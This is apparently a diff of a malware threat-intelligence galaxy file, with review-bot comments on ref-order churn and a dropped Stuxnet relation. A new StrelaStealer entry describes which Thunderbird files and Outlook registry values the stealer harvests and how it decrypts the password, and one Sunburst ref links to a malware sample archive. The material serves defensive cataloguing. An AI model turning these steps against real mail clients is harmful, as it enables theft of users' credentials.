+ "description": "According to PCRisk, StrelaStealer seeks to extract email account log-in credentials. At the time of writing, this program targets Microsoft Outlook and Mozilla Thunderbird email clients.\r\n\r\nFollowing successful infiltration, StrelaStealer searches for \"logins.json\" (account/password) and \"key4.db\" (password database) within the \"%APPDATA%\\Thunderbird\\Profiles\\\" directory - by doing so, it can acquire the credentials for Thunderbird.\r\n\r\nAlternatively, if Outlook credentials are targeted - StrelaStealer seeks out the Windows Registry from where it can retrieve the program's key and \"IMAP User\", \"IMAP Server\", as well as the \"IMAP Password\" values. Since the latter is kept in an encrypted form, the malicious program employs the Windows CryptUnprotectData feature to decrypt it prior to exfiltration.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer",
+ "https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "17f84079-56b8-4be5-bc59-75c8526b0ce0",
+ "value": "StrelaStealer"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint",
+ "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/",
"https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/",
"https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/",
- "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/",
- "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/"
+ "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/"
],
"synonyms": [],
"type": []
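Review bot: the new win.strelastealer description opens with "According to PCRisk", but its refs list only the Malpedia page and the DCSO CyTec medium post; either add the PCRisk article the text is taken from to "refs" or attribute the description to a source that is actually listed, so the provenance of the text stays traceable. The JSON escaping of the Thunderbird profile path ("%APPDATA%\\Thunderbird\\Profiles\\") is correct and needs no change.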
@@ -43371,6 +45750,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat",
+ "https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff",
"https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard",
"https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations"
],
@@ -43385,23 +45765,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity",
- "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/",
- "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf",
- "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/",
- "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg",
- "https://twitter.com/physicaldrive0/status/786293008278970368",
- "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/",
"https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4",
- "https://blog.minerva-labs.com/a-new-strongpity-variant-hides-behind-notepad-installation",
- "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity",
- "https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA",
- "https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara",
+ "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html",
+ "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/",
+ "https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/",
+ "https://twitter.com/physicaldrive0/status/786293008278970368",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf",
+ "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg",
+ "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/",
"https://blogs.blackberry.com/en/2021/11/zebra2104",
- "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/"
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity",
+ "https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara",
+ "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/",
+ "https://blog.minerva-labs.com/a-new-strongpity-variant-hides-behind-notepad-installation",
+ "https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA"
],
"synonyms": [],
"type": []
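Review bot: the 14 `-` lines and 14 `+` lines in the StrongPity refs block are the same URLs in a different order (welivesecurity, both Talos posts, qianxin, bitdefender, cybleinc, both mp.weixin.qq.com links, the physicaldrive0 tweet, securelist, minerva, both anchorednarratives posts, citizenlab), so this hunk changes nothing while making the diff harder to review. The same churn appears in the Stuxnet, Subzero and Suceful hunks below. Suggest having the generator emit refs in a stable order (keep Malpedia's order, or sort them) so that future diffs only show real additions and removals.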
@@ -43414,37 +45794,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf",
- "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html",
"https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper",
- "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
- "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
- "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147",
- "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147",
+ "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html",
+ "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf",
+ "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf",
+ "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html",
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
"https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/",
- "https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet"
+ "https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet",
+ "https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "1b63293f-13f0-4c25-9bf6-6ebc023fc8ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6ad84f52-0025-4a9d-861a-65c870f47988",
"value": "Stuxnet"
},
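Review bot: the Stuxnet entry silently loses its `related` block (the `-` lines from `"related": [` down to the closing `],`), which linked it to `dest-uuid` `1b63293f-13f0-4c25-9bf6-6ebc023fc8ff` with an `almost-certain` `similar` relation. Nothing in the hunk replaces that relationship, and the refs lines around it are again only reordered (the 13 removed URLs reappear in a different order further down, with the ccc.de line changing only by a trailing comma). If the relation was dropped on purpose, please say so in the commit message; if the generator no longer emits `related` from Malpedia, that is a regression that will hit every cluster carrying a relation, not just this one. The Sunburst hunk that follows (`-43527,179 +45898,180`) likewise hides a single net reference addition under roughly 170 moved lines, which argues again for a stable ref order.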
@@ -43453,9 +45824,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.subzero",
+ "https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html",
"https://cdn.netzpolitik.org/wp-upload/2021/12/2018-08-28_DSIRF_Company-Profile-Gov.redacted.pdf",
"https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
- "https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html",
"https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich/"
],
"synonyms": [
@@ -43472,8 +45843,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.suceful",
- "https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html",
- "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf"
+ "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
+ "https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html"
],
"synonyms": [],
"type": []
@@ -43527,179 +45898,180 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst",
+ "https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection",
+ "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/",
+ "https://www.brighttalk.com/webcast/7451/462719",
+ "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q",
+ "https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/",
+ "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q",
+ "https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html",
+ "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html",
+ "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/",
+ "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/",
+ "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/",
+ "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#",
+ "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks",
+ "https://netresec.com/?b=211cd21",
+ "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/",
+ "https://twitter.com/cybercdh/status/1338975171093336067",
+ "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack",
+ "https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html",
+ "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/",
+ "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf",
+ "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/",
+ "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities",
+ "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs",
+ "https://github.com/SentineLabs/SolarWinds_Countermeasures",
+ "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610",
+ "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident",
+ "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf",
+ "https://www.fireeye.com/current-threats/sunburst-malware.html",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/",
+ "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947",
+ "https://twitter.com/cybercdh/status/1338885244246765569",
+ "https://github.com/fireeye/Mandiant-Azure-AD-Investigator",
+ "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
+ "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
+ "https://www.cadosecurity.com/post/responding-to-solarigate",
+ "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/",
+ "https://twitter.com/ItsReallyNick/status/1338382939835478016",
+ "https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware",
+ "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/",
+ "https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/",
+ "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a",
+ "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
+ "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/",
+ "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
+ "https://www.youtube.com/watch?v=mbGN1xqy1jY",
+ "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306",
+ "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure",
+ "https://www.brighttalk.com/webcast/7451/469525",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/",
+ "https://www.mimecast.com/incident-report/",
+ "https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/",
+ "https://github.com/RedDrip7/SunBurst_DGA_Decode",
+ "https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/",
+ "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f",
+ "https://twitter.com/KimZetter/status/1338305089597964290",
+ "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
+ "https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims",
+ "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/",
+ "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/",
+ "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/",
+ "https://us-cert.cisa.gov/remediating-apt-compromised-networks",
+ "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/",
+ "https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/",
+ "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling",
+ "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS",
+ "https://netresec.com/?b=211f30f",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
+ "https://www.4hou.com/posts/KzZR",
+ "https://www.comae.com/posts/sunburst-memory-analysis/",
+ "https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html",
+ "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/",
+ "https://www.youtube.com/watch?v=dV2QTLSecpc",
"https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/",
+ "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/",
+ "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign",
+ "https://community.riskiq.com/article/9a515637",
+ "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714",
+ "https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/",
+ "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html",
+ "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view",
+ "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution",
+ "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data",
+ "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm",
+ "https://youtu.be/SW8kVkwDOrc?t=24706",
+ "https://www.mandiant.com/media/10916/download",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds",
+ "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/",
+ "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html",
+ "https://twitter.com/megabeets_/status/1339308801112027138",
+ "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance",
+ "https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth",
+ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/",
+ "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
"https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
"https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons",
- "https://www.youtube.com/watch?v=JoMwrkijTZ8",
- "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/",
- "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
- "https://youtu.be/Ta_vatZ24Cs?t=59",
- "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident",
- "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack",
- "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html",
- "https://pastebin.com/6EDgCKxd",
- "https://github.com/RedDrip7/SunBurst_DGA_Decode",
- "https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#",
- "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html",
- "https://twitter.com/cybercdh/status/1338885244246765569",
- "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug",
- "https://www.youtube.com/watch?v=-Vsgmw2G4Wo",
- "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst",
- "https://github.com/SentineLabs/SolarWinds_Countermeasures",
- "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS",
- "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/",
- "https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/",
- "https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/",
- "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/",
- "https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection",
- "https://www.mimecast.com/blog/important-security-update/",
- "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs",
- "https://www.youtube.com/watch?v=dV2QTLSecpc",
- "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html",
- "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards",
- "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
- "https://www.solarwinds.com/securityadvisory/faq",
- "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha",
- "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
- "https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html",
- "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack",
- "https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/",
- "https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/",
- "https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure",
- "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/",
- "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/",
- "https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/",
- "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html",
- "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/",
- "https://securelist.com/sunburst-backdoor-kazuar/99981/",
- "https://netresec.com/?b=211f30f",
- "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/",
- "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q",
- "https://www.youtube.com/watch?v=cMauHTV-lJg",
- "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
- "https://www.mandiant.com/media/10916/download",
- "https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims",
- "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
- "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html",
- "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/",
- "https://unit42.paloaltonetworks.com/atoms/solarphoenix/",
- "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
- "https://twitter.com/0xrb/status/1339199268146442241",
- "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f",
- "https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/",
- "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more",
- "https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html",
- "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign",
- "https://twitter.com/Intel471Inc/status/1339233255741120513",
- "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view",
- "https://www.youtube.com/watch?v=GfbxHy6xnbA",
- "https://twitter.com/megabeets_/status/1339308801112027138",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/",
- "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/ItsReallyNick/status/1338382939835478016",
- "https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095",
- "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution",
- "https://twitter.com/cybercdh/status/1338975171093336067",
- "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html",
- "https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/",
- "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306",
- "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection",
- "https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/",
- "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf",
- "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://www.mimecast.com/incident-report/",
- "https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/",
- "https://twitter.com/cybercdh/status/1339241246024404994",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga",
- "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610",
- "https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware",
- "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947",
- "https://twitter.com/FireEye/status/1339295983583244302",
- "https://www.comae.com/posts/sunburst-memory-analysis/",
- "https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/",
- "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/",
- "https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json",
- "https://community.riskiq.com/article/9a515637",
- "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/",
- "https://github.com/fireeye/sunburst_countermeasures",
- "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/",
- "https://www.solarwinds.com/securityadvisory",
- "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en",
- "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation",
